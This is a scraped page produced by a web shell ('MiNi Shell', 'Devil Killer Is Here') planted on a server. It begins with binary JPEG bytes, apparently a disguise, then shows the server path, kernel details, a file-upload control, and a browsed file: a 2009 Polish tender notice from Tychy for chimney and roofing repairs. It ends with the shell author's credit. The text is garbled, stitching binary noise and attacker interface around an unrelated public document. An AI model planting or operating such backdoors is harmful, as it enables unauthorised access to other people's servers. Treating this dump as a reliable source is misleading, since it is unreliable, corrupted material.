JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090812/132215-N-2009.html

<p class="kh_header"><b>Tychy: Wymiana ław kominowych oraz pokrycia papowego na stropie betonowym         w budynkach mieszkalnych-wielorodzinnych, administrowanych przez                Rejon Obsługi Mieszkańców Nr II w Tychach</b><br>
<b>Numer ogłoszenia: 132215 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana ław kominowych oraz pokrycia papowego na stropie betonowym         w budynkach mieszkalnych-wielorodzinnych, administrowanych przez                Rejon Obsługi Mieszkańców Nr II w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane w zakresie wykonania remontu ław kominowych oraz wymiany pokrycia papowego na stropie betonowym klatek wraz              z robotami towarzyszącymi w budynkach mieszkalnych - wielorodzinnych, z podziałem na    2 zadania.  

 1) Zamówienie składa się z 2 części, zwanych dalej zadaniami.

 2) Oznaczenie zadań:
 
        ZADANIE Nr 1 - Wymiana ław kominowych w budynkach mieszkalnych - wielorodzinnych
Wspólnoty Mieszkaniowej Nr 32/II, przy ul. Ojca Bocheńskiego 1-7, Budowlanych 38, administrowanych przez Rejon Obsługi Mieszkańców Nr II w Tychach

      ZADANIE Nr 2 - Wymiana pokrycia papowego na stropie betonowym w dwóch klatkach
budynku mieszkalnego - wielorodzinnego Wspólnoty Mieszkaniowej Nr 54/II, przy           
     ul. Batorego 4a-8, administrowanego przez Rejon Obsługi Mieszkańców Nr II w Tychach

   3) Zakres robót obejmuje m.in.:  


dla ZADANIA Nr 1 

Na wymianę ław kominowych w budynkach, przy ul. Ojca Bocheńskiego 1-7, Budowlanych 38:
- demontaż starych ław kominowych ;
- wykonanie i umocowanie nowych ław kominowych ;
- wywóz gruzu ;

dla ZADANIA Nr 2 
Na wymianę pokrycia papowego na stropie betonowym klatek, przy ul. Batorego    nr kl. 6b i 8:
- zerwanie starej papy (4 warstwy) ;
- wymiana pasa nadrynnowego od strony podwórka ;
- położenie nowej papy termozgrzewalnej ;
- wywóz gruzu ;

 Szczegółowy zakres robót określają przedmiary robót dla Zadania Nr 1 i Nr 2, stanowiące załączniki do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.25.22-6, 45.41.00.00-4, 45.42.20.00-1, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu i sposób dokonywania ich oceny:    
1. O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na podstawie art. 22 ust.1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (tekst jednolity Dz. U. z 20 listopada 2007 r., Nr 223, poz. 1655, ze zm.), tj.:  
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ; 
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
      i osobami zdolnymi do wykonania zamówienia lub  przedstawią pisemne zobowiązanie 
      innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 
      wykonania zamówienia ; 
 c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ;    
 d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia ; 
      oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia. 


      ZAMAWIAJĄCY WYMAGA, ABY WYKONAWCA WYKAZAŁ, ŻE:

1) dysponuje lub będzie dysponował osobą / osobami zdolnymi do wykonania zamówienia,      w szczególności uprawnionymi do sprawowania samodzielnych funkcji technicznych                 w budownictwie w specjalnościach niezbędnych do wykonania robót budowlanych                (art. 12 i 13 ustawy z dnia 7 lipca 1994r. - Prawo Budowlane ( Dz. U. z 2006 r. Nr 156 ,  poz. 118 ze zm.), którzy są  członkami Polskiej  Izby Inżynierów Budownictwa (art. 6 ustawy         z dnia 15 grudnia 2000 r. o samorządach  zawodowych, architektów, inżynierów budowlanych i Urbanistów, Dz. U. z 2001 r. Nr 5, poz. 42  z późn. zm.), tj.: osobą / osobami posiadającymi uprawnienia budowlane w konstrukcyjno - budowlanej (kierownik robót).
      - dot. Zadania Nr 1 i Nr 2
2) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał    z należytą starannością co najmniej dwie roboty odpowiadające swoim rodzajem i wartością  robotom budowlanym stanowiącym przedmiot zamówienia, tj. :

dla Zadania Nr 1 : nie dotyczy

dla Zadania Nr 2 : należy wykazać co najmniej dwie roboty zrealizowane w ramach odrębnych kontraktów, polegające na wykonaniu robót dekarskich w zakresie krycia papą , o wartości każdej z tych robót nie mniejszej niż 9 000,00 zł (brutto)

3) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - o wartości ubezpieczenia nie mniejszej niż :

dla Zadania Nr 1 :   5 000,00 zł

dla Zadania Nr 2 : 15 000,00 zł

2.  Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie 
     złożonego oświadczenia oraz dołączonych do oferty dokumentów wymienionych w punkcie II niniejszego rozdziału według zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy 
      w celu potwierdzenia spełnienia warunków udziału w postępowaniu:

  1. Wykonawca wraz z ofertą składa następujące oświadczenia i dokumenty: 
      
1) oświadczenie potwierdzające spełnienie warunku udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4  ustawy - Pzp. 
       - wzór druku oświadczenia stanowi załącznik do specyfikacji ;
        - dot. Zadania Nr 1 i Nr 2
       (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia                
        oświadczenie o spełnianiu warunków udziału w postępowaniu składają wszyscy Wykonawcy)

  2) aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;  
      - dot. Zadania Nr 1 i Nr 2

3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
      - dot. Zadania Nr 1 i Nr 2
                ( W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 2) i 3) muszą być złożone dla każdego z nich).

4) aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności                - o wartości ubezpieczenia nie mniejszej niż :

   dla Zadania Nr 1 :   5 000,00 zł

   dla Zadania Nr 2 : 15 000,00 zł

Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN, Zamawiający przeliczy na PLN, przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.
    ( W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli  
    Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z Wykonawców)
5) wykaz wykonanych robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem wartości oraz daty    i miejsca wykonania :

dla Zadania Nr 1 : nie dotyczy

dla Zadania Nr 2 : należy wykazać co najmniej dwie roboty zrealizowane w ramach odrębnych kontraktów, polegające na wykonaniu robót dekarskich w zakresie krycia papą , o wartości każdej z tych robót nie mniejszej niż 9 000,00 zł (brutto) oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie ;

  - W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli 
    Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z wykonawców.  

6) kserokopię uprawnień budowlanych w specjalności konstrukcyjno - budowlanej (kierownik robót) oraz aktualne zaświadczenia z właściwej Izby Inżynierów Budownictwa ;
   - dot. Zadania Nr 1 i Nr 2
     (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie 
     lub co najmniej jeden z Wykonawców).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - pokój Nr 20, cena 15 zł (brutto) lub za zaliczeniem pocztowym. Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej przekazanie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 13:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43 - 100 Tychy, ul. Filaretów 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1 - Wymiana ław kominowych w budynkach mieszkalnych - wielorodzinnych
Wspólnoty Mieszkaniowej Nr 32/II, przy ul. Ojca Bocheńskiego 1-7, Budowlanych 38, administrowanych przez Rejon Obsługi Mieszkańców Nr II w Tychach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:  


dla ZADANIA Nr 1 

Na wymianę ław kominowych w budynkach, przy ul. Ojca Bocheńskiego 1-7, Budowlanych 38:
- demontaż starych ław kominowych ;
- wykonanie i umocowanie nowych ław kominowych ;
- wywóz gruzu ;
Szczegółowy zakres robót określa przedmiar robót dla Zadania Nr 1, stanowiący załącznik do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.20.00-1, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2 - Wymiana pokrycia papowego na stropie betonowym w dwóch klatkach
budynku mieszkalnego - wielorodzinnego Wspólnoty Mieszkaniowej Nr 54/II, przy           
     ul. Batorego 4a-8, administrowanego przez Rejon Obsługi Mieszkańców Nr II w Tychach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:  
dla ZADANIA Nr 2 
Na wymianę pokrycia papowego na stropie betonowym klatek, przy ul. Batorego    nr kl. 6b i 8:
- zerwanie starej papy (4 warstwy) ;
- wymiana pasa nadrynnowego od strony podwórka ;
- położenie nowej papy termozgrzewalnej ;
- wywóz gruzu ;

 Szczegółowy zakres robót określa przedmiar robót dla Zadania Nr 2, stanowiący załącznik do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.25.22-6, 45.41.00.00-4, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com